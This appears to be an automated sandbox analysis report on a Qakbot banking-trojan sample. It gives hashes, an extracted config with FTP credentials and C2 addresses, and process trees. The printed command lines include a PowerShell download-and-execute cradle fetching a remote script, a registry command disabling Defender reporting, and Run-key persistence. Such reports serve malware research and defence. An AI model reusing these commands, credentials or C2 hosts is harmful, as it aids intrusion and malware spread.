qakbot | 058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

General

Target

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
Size

400KB
MD5

30f804952e82a4bf30c776402967850f
SHA1

6db90c30220e594b31366a24a53fdb55308a4357
SHA256

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608
SHA512

987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Score

10^/10

qakbot 1518695014 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Version

322.148

Campaign

1518695014

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
[email protected]
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

179.62.153.88:443

50.198.141.161:2222

69.129.91.38:443

66.189.228.49:995

96.253.104.73:443

71.183.129.113:443

125.25.130.203:995

173.175.174.154:443

162.104.186.175:995

75.109.222.140:995

68.173.55.51:443

78.175.254.43:443

106.159.251.143:995

47.143.83.172:443

71.190.202.120:443

73.136.232.174:995

96.253.104.73:995

192.158.217.32:22

65.153.16.250:993

70.95.129.59:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 772 powershell.exe
6 772 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

harfw.exeharfw.exe

pid process

1452 harfw.exe
1368 harfw.exe

flow	pid	process
5	772	powershell.exe
6	772	powershell.exe

pid	process
1452	harfw.exe
1368	harfw.exe

Loads dropped DLL 3 IoCs

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exeharfw.exe

pid	process
836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
1452	harfw.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\dmanwx = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Harfwa\\harfw.exe\""	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1996 PING.EXE

pid	process
1996	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exeharfw.exeharfw.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXE

pid	process
836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
1636	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
1636	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
1452	harfw.exe
1368	harfw.exe
772	powershell.exe
1368	harfw.exe
396	explorer.exe
1256	taskhost.exe
396	explorer.exe
1360	Dwm.exe
1396	Explorer.EXE
836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
772	powershell.exe
688	conhost.exe
396	explorer.exe
920	cmd.exe
1572	conhost.exe
1996	PING.EXE
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe
396	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1396 Explorer.EXE
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

harfw.exe

pid process

1452 harfw.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 772 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1396 Explorer.EXE
1396 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1396 Explorer.EXE
1396 Explorer.EXE

pid	process
1396	Explorer.EXE

pid	process
1452	harfw.exe

description	pid	process
Token: SeDebugPrivilege	772	powershell.exe

pid	process
1396	Explorer.EXE
1396	Explorer.EXE

pid	process
1396	Explorer.EXE
1396	Explorer.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exeharfw.exeexplorer.execmd.exe

description	pid	process	target process
PID 836 wrote to memory of 1636	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 836 wrote to memory of 1636	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 836 wrote to memory of 1636	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 836 wrote to memory of 1636	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 836 wrote to memory of 1452	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	harfw.exe
PID 836 wrote to memory of 1452	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	harfw.exe
PID 836 wrote to memory of 1452	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	harfw.exe
PID 836 wrote to memory of 1452	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	harfw.exe
PID 836 wrote to memory of 1080	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	reg.exe
PID 836 wrote to memory of 1080	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	reg.exe
PID 836 wrote to memory of 1080	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	reg.exe
PID 836 wrote to memory of 1080	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	reg.exe
PID 836 wrote to memory of 772	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	powershell.exe
PID 836 wrote to memory of 772	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	powershell.exe
PID 836 wrote to memory of 772	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	powershell.exe
PID 836 wrote to memory of 772	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	powershell.exe
PID 1452 wrote to memory of 1368	1452	harfw.exe	harfw.exe
PID 1452 wrote to memory of 1368	1452	harfw.exe	harfw.exe
PID 1452 wrote to memory of 1368	1452	harfw.exe	harfw.exe
PID 1452 wrote to memory of 1368	1452	harfw.exe	harfw.exe
PID 1452 wrote to memory of 396	1452	harfw.exe	explorer.exe
PID 1452 wrote to memory of 396	1452	harfw.exe	explorer.exe
PID 1452 wrote to memory of 396	1452	harfw.exe	explorer.exe
PID 1452 wrote to memory of 396	1452	harfw.exe	explorer.exe
PID 1452 wrote to memory of 396	1452	harfw.exe	explorer.exe
PID 396 wrote to memory of 1256	396	explorer.exe	taskhost.exe
PID 396 wrote to memory of 1256	396	explorer.exe	taskhost.exe
PID 396 wrote to memory of 1256	396	explorer.exe	taskhost.exe
PID 396 wrote to memory of 1360	396	explorer.exe	Dwm.exe
PID 396 wrote to memory of 1360	396	explorer.exe	Dwm.exe
PID 396 wrote to memory of 1360	396	explorer.exe	Dwm.exe
PID 396 wrote to memory of 1396	396	explorer.exe	Explorer.EXE
PID 396 wrote to memory of 1396	396	explorer.exe	Explorer.EXE
PID 396 wrote to memory of 1396	396	explorer.exe	Explorer.EXE
PID 396 wrote to memory of 836	396	explorer.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 396 wrote to memory of 836	396	explorer.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 396 wrote to memory of 836	396	explorer.exe	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
PID 396 wrote to memory of 772	396	explorer.exe	powershell.exe
PID 396 wrote to memory of 772	396	explorer.exe	powershell.exe
PID 396 wrote to memory of 772	396	explorer.exe	powershell.exe
PID 396 wrote to memory of 688	396	explorer.exe	conhost.exe
PID 396 wrote to memory of 688	396	explorer.exe	conhost.exe
PID 396 wrote to memory of 688	396	explorer.exe	conhost.exe
PID 836 wrote to memory of 920	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 836 wrote to memory of 920	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 836 wrote to memory of 920	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 836 wrote to memory of 920	836	058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe	cmd.exe
PID 920 wrote to memory of 1996	920	cmd.exe	PING.EXE
PID 920 wrote to memory of 1996	920	cmd.exe	PING.EXE
PID 920 wrote to memory of 1996	920	cmd.exe	PING.EXE
PID 920 wrote to memory of 1996	920	cmd.exe	PING.EXE
PID 396 wrote to memory of 920	396	explorer.exe	cmd.exe
PID 396 wrote to memory of 920	396	explorer.exe	cmd.exe
PID 396 wrote to memory of 920	396	explorer.exe	cmd.exe
PID 396 wrote to memory of 1572	396	explorer.exe	conhost.exe
PID 396 wrote to memory of 1572	396	explorer.exe	conhost.exe
PID 396 wrote to memory of 1572	396	explorer.exe	conhost.exe
PID 396 wrote to memory of 1996	396	explorer.exe	PING.EXE
PID 396 wrote to memory of 1996	396	explorer.exe	PING.EXE
PID 396 wrote to memory of 1996	396	explorer.exe	PING.EXE

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1396

C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:836

C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe
"C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe" /C
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1452

C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe" /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1368

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\nvtbwkfteawercajkosxmtvjkb.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:1996

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1360

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1048679824-641473634-5093629621605390816-1721825357-13111516982259047032052131543"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:688

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "55744527-1190308623108169139918329020741157474417-1791291403-1384991350515096794"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1572

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harf.dat
MD5
c019c9971ac9b09a446c52697ad6463f

SHA1
b7e7ab1dd2bb91e31beb0bc712e8a66f0f54a9f7

SHA256
11ccb77316c9a2b4f76707ae01b9859dc3f8ef58499be1ad299195704f288829

SHA512
449dacc6cc424408689f70f0d629788b59cda6836789387b012130f3d8a0a4092c47cb54bd5a83a61fb223d1062d2a921715a1ddfd4c049d12a4221c630c2d73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Harfwa\harfw.exe
MD5
30f804952e82a4bf30c776402967850f

SHA1
6db90c30220e594b31366a24a53fdb55308a4357

SHA256
058299a1b3a0634c0a6486a7ae043ca0c0ff24148843d6b322354c86e82a0608

SHA512
987063f865d77919d8ec3bacdba9380a67a7c39c528a332dcd038cd5577a091928e569fdf4e00bdb876cb234ecaa2dd8bafb5aa97b4331b8564c1f69e90b6c92

Download Submit
memory/396-92-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/396-99-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/396-131-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/396-110-0x00000000020A0000-0x00000000020A1000-memory.dmp

Filesize
4KB

Download
memory/396-108-0x0000000002040000-0x0000000002041000-memory.dmp

Filesize
4KB

Download
memory/396-107-0x0000000002030000-0x0000000002031000-memory.dmp

Filesize
4KB

Download
memory/396-70-0x00000000745E1000-0x00000000745E3000-memory.dmp

Filesize
8KB

Download
memory/396-97-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/396-72-0x00000000000C0000-0x0000000000128000-memory.dmp

Filesize
416KB

Download
memory/396-91-0x00000000007D0000-0x00000000007D1000-memory.dmp

Filesize
4KB

Download
memory/396-88-0x0000000000630000-0x000000000065F000-memory.dmp

Filesize
188KB

Download
memory/396-85-0x00000000007C0000-0x00000000007C1000-memory.dmp

Filesize
4KB

Download
memory/396-84-0x00000000004E0000-0x00000000004E1000-memory.dmp

Filesize
4KB

Download
memory/396-83-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/688-111-0x0000000077060000-0x0000000077061000-memory.dmp

Filesize
4KB

Download
memory/688-109-0x0000000000160000-0x000000000018C000-memory.dmp

Filesize
176KB

Download
memory/772-60-0x000007FEF2D00000-0x000007FEF385D000-memory.dmp

Filesize
11.4MB

Download
memory/772-65-0x000007FEF542E000-0x000007FEF542F000-memory.dmp

Filesize
4KB

Download
memory/772-116-0x000007FEFEF80000-0x000007FEFEF81000-memory.dmp

Filesize
4KB

Download
memory/772-113-0x0000000077060000-0x0000000077061000-memory.dmp

Filesize
4KB

Download
memory/772-112-0x000000001B6A0000-0x000000001B6CC000-memory.dmp

Filesize
176KB

Download
memory/772-66-0x0000000001FE0000-0x0000000001FE2000-memory.dmp

Filesize
8KB

Download
memory/772-71-0x0000000001FEB000-0x000000000200A000-memory.dmp

Filesize
124KB

Download
memory/772-67-0x0000000001FE2000-0x0000000001FE4000-memory.dmp

Filesize
8KB

Download
memory/772-59-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

Filesize
8KB

Download
memory/772-68-0x0000000001FE4000-0x0000000001FE7000-memory.dmp

Filesize
12KB

Download
memory/836-94-0x0000000000280000-0x00000000002A7000-memory.dmp

Filesize
156KB

Download
memory/836-105-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/836-53-0x0000000076421000-0x0000000076423000-memory.dmp

Filesize
8KB

Download
memory/836-101-0x0000000000280000-0x00000000002A7000-memory.dmp

Filesize
156KB

Download
memory/836-100-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/836-103-0x0000000077490000-0x0000000077491000-memory.dmp

Filesize
4KB

Download
memory/920-129-0x0000000077490000-0x0000000077491000-memory.dmp

Filesize
4KB

Download
memory/920-118-0x0000000000150000-0x0000000000178000-memory.dmp

Filesize
160KB

Download
memory/920-130-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/920-128-0x0000000000120000-0x0000000000147000-memory.dmp

Filesize
156KB

Download
memory/1256-86-0x00000000005A0000-0x00000000005A1000-memory.dmp

Filesize
4KB

Download
memory/1256-76-0x00000000005A0000-0x00000000005A1000-memory.dmp

Filesize
4KB

Download
memory/1256-87-0x0000000001B50000-0x0000000001B7C000-memory.dmp

Filesize
176KB

Download
memory/1256-74-0x0000000001B50000-0x0000000001B7C000-memory.dmp

Filesize
176KB

Download
memory/1256-90-0x0000000077060000-0x0000000077061000-memory.dmp

Filesize
4KB

Download
memory/1256-75-0x0000000001B80000-0x0000000001BAD000-memory.dmp

Filesize
180KB

Download
memory/1256-89-0x00000000772E1000-0x00000000772E2000-memory.dmp

Filesize
4KB

Download
memory/1360-93-0x0000000001E30000-0x0000000001E5C000-memory.dmp

Filesize
176KB

Download
memory/1360-95-0x0000000077060000-0x0000000077061000-memory.dmp

Filesize
4KB

Download
memory/1396-115-0x0000000077060000-0x0000000077061000-memory.dmp

Filesize
4KB

Download
memory/1396-114-0x00000000026E0000-0x000000000270C000-memory.dmp

Filesize
176KB

Download
memory/1572-132-0x0000000001AD0000-0x0000000001AFC000-memory.dmp

Filesize
176KB

Download
memory/1572-133-0x0000000077060000-0x0000000077061000-memory.dmp

Filesize
4KB

Download
memory/1996-134-0x0000000000250000-0x0000000000277000-memory.dmp

Filesize
156KB

Download
memory/1996-135-0x0000000077490000-0x0000000077491000-memory.dmp

Filesize
4KB

Download
memory/1996-136-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads